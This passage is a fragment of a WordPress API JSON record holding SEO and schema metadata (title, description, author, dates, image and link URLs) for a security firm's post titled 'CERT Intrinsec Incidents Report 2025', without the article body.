s\u00e9curit\u00e9.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png\",\"contentUrl\":\"https:\\\/\\\/www.intrinsec.com\\\/wp-content\\\/uploads\\\/2026\\\/02\\\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png\",\"width\":1456,\"height\":816},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/cert-intrinsec-incidents-report-2025\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.intrinsec.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CERT Intrinsec Incidents Report 2025\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#website\",\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/\",\"name\":\"INTRINSEC\",\"description\":\"Notre m\u00e9tier , Prot\u00e9ger le v\u00f4tre\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.intrinsec.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#\\\/schema\\\/person\\\/eb68c362eb25b906b7a3ebb412634a28\",\"name\":\"Quentin 
Peyronnet\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g\",\"caption\":\"Quentin Peyronnet\"},\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/author\\\/quentin-peyronnet\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Report on cyber incidents and recommendations","description":"Discover our cyber incident report and our actionable findings to improve your security.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.intrinsec.com\/en\/cert-intrinsec-incidents-report-2025\/","og_locale":"en_US","og_type":"article","og_title":"CERT Intrinsec Incidents Report 2025","og_description":"D\u00e9couvrez notre rapport sur les incidents cyber et nos r\u00e9sultats actionnables pour am\u00e9liorer votre s\u00e9curit\u00e9.","og_url":"https:\/\/www.intrinsec.com\/en\/cert-intrinsec-incidents-report-2025\/","og_site_name":"INTRINSEC","article_published_time":"2026-02-24T15:09:37+00:00","article_modified_time":"2026-03-27T14:43:56+00:00","og_image":[{"width":1456,"height":816,"url":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png","type":"image\/png"}],"author":"Quentin Peyronnet","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Quentin Peyronnet","Est. 
reading time":"20 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#article","isPartOf":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/"},"author":{"name":"Quentin Peyronnet","@id":"https:\/\/www.intrinsec.com\/#\/schema\/person\/eb68c362eb25b906b7a3ebb412634a28"},"headline":"CERT Intrinsec Incidents Report 2025","datePublished":"2026-02-24T15:09:37+00:00","dateModified":"2026-03-27T14:43:56+00:00","mainEntityOfPage":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/"},"wordCount":3770,"image":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#primaryimage"},"thumbnailUrl":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png","keywords":["Incident Response"],"articleSection":["CERT"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/","url":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/","name":"Report on cyber incidents and recommendations","isPartOf":{"@id":"https:\/\/www.intrinsec.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#primaryimage"},"image":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#primaryimage"},"thumbnailUrl":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png","datePublished":"2026-02-24T15:09:37+00:00","dateModified":"2026-03-27T14:43:56+00:00","author":{"@id":"https:\/\/www.intrinsec.com\/#\/schema\/person\/eb68c362eb25b906b7a3ebb412634a28"},"description":"Discover our cyber incident report and our actionable findings to improve your 
security.","breadcrumb":{"@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#primaryimage","url":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png","contentUrl":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2026\/02\/guttest192_illustration_of_emergency_procedure_in_cyber_securit_f7e3b5c9-9b90-44ad-837c-fe1012c7225a.png","width":1456,"height":816},{"@type":"BreadcrumbList","@id":"https:\/\/www.intrinsec.com\/cert-intrinsec-incidents-report-2025\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.intrinsec.com\/"},{"@type":"ListItem","position":2,"name":"CERT Intrinsec Incidents Report 2025"}]},{"@type":"WebSite","@id":"https:\/\/www.intrinsec.com\/#website","url":"https:\/\/www.intrinsec.com\/","name":"INTRINSEC","description":"Our job is to protect yours.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.intrinsec.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.intrinsec.com\/#\/schema\/person\/eb68c362eb25b906b7a3ebb412634a28","name":"Quentin 
Peyronnet","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f1a18fbb4c9c0cff7626186835c06291da8571ef36fc97838db40c28fde159b8?s=96&d=retro&r=g","caption":"Quentin Peyronnet"},"url":"https:\/\/www.intrinsec.com\/en\/author\/quentin-peyronnet\/"}]}},"_links":{"self":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts\/231421","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/users\/54"}],"replies":[{"embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/comments?post=231421"}],"version-history":[{"count":16,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts\/231421\/revisions"}],"predecessor-version":[{"id":231654,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts\/231421\/revisions\/231654"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/media\/231445"}],"wp:attachment":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/media?parent=231421"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/categories?post=231421"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/tags?post=231421"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}